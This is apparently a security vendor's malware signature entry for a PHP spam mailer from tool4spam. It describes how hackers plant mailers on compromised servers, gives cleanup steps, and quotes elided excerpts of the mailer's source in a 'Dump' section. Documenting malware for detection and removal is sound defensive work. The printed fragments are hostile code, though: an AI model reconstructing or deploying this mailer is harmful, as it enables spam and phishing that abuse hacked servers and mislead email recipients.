Malware Signatures

  1. Home
  2. Malware Signatures
  3. php.hacktool.mailer-tool4spam.001

php.hacktool.mailer-tool4spam.001

Mailers is a category of scripts that hackers install on compromised servers to send out spam and anonymous emails.
They take advantage of the servers' bandwidth and other resourses to send out tons of spam emails in a short time. Moreover, headers of such emails don't contain traces of the hackers - they lead to the hacked server -
so all the spam campaign remains quite anonymous. Hacked servers is not a scarse resourse and spammers don't care much if one of them gets blacklisted for spamming they can easily move to another server. However, to minimize risks of
blacklisting, they usually evenly distribute mailing between several hacked servers.
tool4spam is a provider of scripts for spamming and hacking. Specifically they have a M-9AWED Mailer generator script that prepares a custom mailer script and auxilary file to send specific email to a list of recepients.
Such script can be used by spammers and phishers.

Affecting

Any servers with enabled PHP

Cleanup

You should find this script and all the auxilary files that usually have names in the form <attacker's-ip-address>.php, <attacker's-ip-address>.txt and 127.0.0.2.txt. They can be found next to it. Sometimes hackers also create the "Send" subdirectory.
You should delete all these files and subdirectories. Scan your server for other types of malware and specifically for backdoors. Make sure to identy and close the security hole.
You also need to check if your server IP address got blacklisted by various anti-spam and phishing blacklist providers as a result of hacker activity.
You can sign up with us and let our team remove the malware for you.

Dump

... excerpts ...
...
/**************** This tool is made by http://tool4spam.com  ********************/
/****************     visit us for more spam and hack tools    ********************/
$ip = getenv("REMOTE_ADDR");
$ipconf = '.t';
$ipsmart = 'xt';
$type = $ipconf.$ipsmart;
if ($_POST['SenderBigCave']=='<--- Sp4m3r Fb3 --->'){
header('location:'.$ip.'.php');
$aftersend = '';
$localhost = '127.0.0.2';
$endtype = $aftersend.$localhost.$type;
$endtype1 = file_get_contents($endtype);
$file= fopen("".$ip.".php", "w+");
fwrite($file, "");
fclose($file);
...
$file= fopen("".$ip.".txt", "w+");
fwrite($file, $letter);
fclose($file);
$sendername = $_POST['SenderName'];
$subject = $_POST['Subject'];
echo $sendername."
".$sendermail."
".$letter."
".$to."
".$ip; $to = $_POST['Mailist']; $file= fopen("".$ip.".php", "a"); fwrite($file, " "); fwrite($file, ' ... header('location:'.$ip.'.php'); }else{ if(!file_exists("Send")){ mkdir("Send", 0777); } $index = fopen("index.php", "w+"); fwrite ($index, '
Created By Sp4m3r Fb3
CoNtAcT : Sil-x@w.cN
'); fclose($index); $txt = fopen("127.0.0.2.txt", "w+"); ...

...